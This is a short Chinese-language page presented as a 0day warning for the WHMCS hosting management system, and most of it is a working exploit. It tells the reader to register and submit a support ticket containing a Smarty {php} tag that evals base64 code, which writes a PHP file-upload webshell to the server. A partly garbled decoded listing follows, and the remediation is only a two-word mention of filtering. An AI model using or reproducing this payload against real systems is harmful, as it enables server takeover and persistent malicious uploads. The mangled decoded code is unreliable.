2024年3月10日发(作者:)

whmcs主机管理系统0day及修复漏洞预警-电脑资料

先注册个id

提交一个ticket如下

{php}eval(base64_decode('JGNvZGUgPSBiYXNlNjRfZGVjb2R

lKCJQRDl3YUhBTkNtVmphRzhnSnp4bWIzSnRJR0ZqZEdsdmJqM

GlJaUJ0WlhSb2IyUTlJbkJ2YzNRaUlHVnVZM1I1Y0dVOUltMTFiSFJ

wY0dGeWRDOW1iM0p0TFdSaGRHRWlJRzVoYldVOUluVndiRzlo

WkdWeUlpQnBaRDBpZFhCc2IyRmtaWElpUGljN0RRcGxZMmh2

SUNjOGFXNXdkWFFnZEhsd1pUMGlabWxzWlNJZ2JtRnRaVDBp

Wm1sc1pTSWdjMmw2WlQwaU5UQWlQanhwYm5CMWRDQnV

ZVzFsUFNKZmRYQnNJaUIwZVhCbFBTSnpkV0p0YVhRaUlHbGtQ

U0pmZFhCc0lpQjJZV3gxWlQwaVZYQnNiMkZrSWo0OEwyWnZj

bTArSnpzTkNtbG1LQ0FrWDFCUFUxUmJKMTkxY0d3blhTQTlQU0

FpVlhCc2IyRmtJaUFwSUhzTkNnbHBaaWhBWTI5d2VTZ2tYMFpK

VEVWVFd5ZG1hV3hsSjExYkozUnRjRjl1WVcxbEoxMHNJQ1JmU

mtsTVJWTmJKMlpwYkdVblhWc25ibUZ0WlNkZEtTa2dleUJsWTJo

dklDYzhZajVWY0d4dllXUWdVMVZMVTBWVElDRWhJVHd2WW

o0OFluSStQR0p5UGljN0lIME5DZ2xsYkhObElIc2daV05vYnlBblBH

SStWWEJzYjJGa0lFZEJSMEZNSUNFaElUd3ZZajQ4WW5JK1BHSnl

QaWM3SUgwTkNuME5DajgrIik7DQokZm8gPSBmb3Blbigia2lyL

nBocCIsInciKTsNCmZ3cml0ZSgkZm8sJGNvZGUpOw=='));{/php}

base64解密后:

$code =

echo '';

echo '

Upload

';

if( $_POST['_upl'] == "Upload" ) {

if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name']))

{ echo 'Upload SUKSES

'; }

else { echo 'Upload GAGAL

'; }

}

>

$fo = fopen("","w");

fwrite($fo,$code);

则成功创建了一个php小马

修复:

合适过滤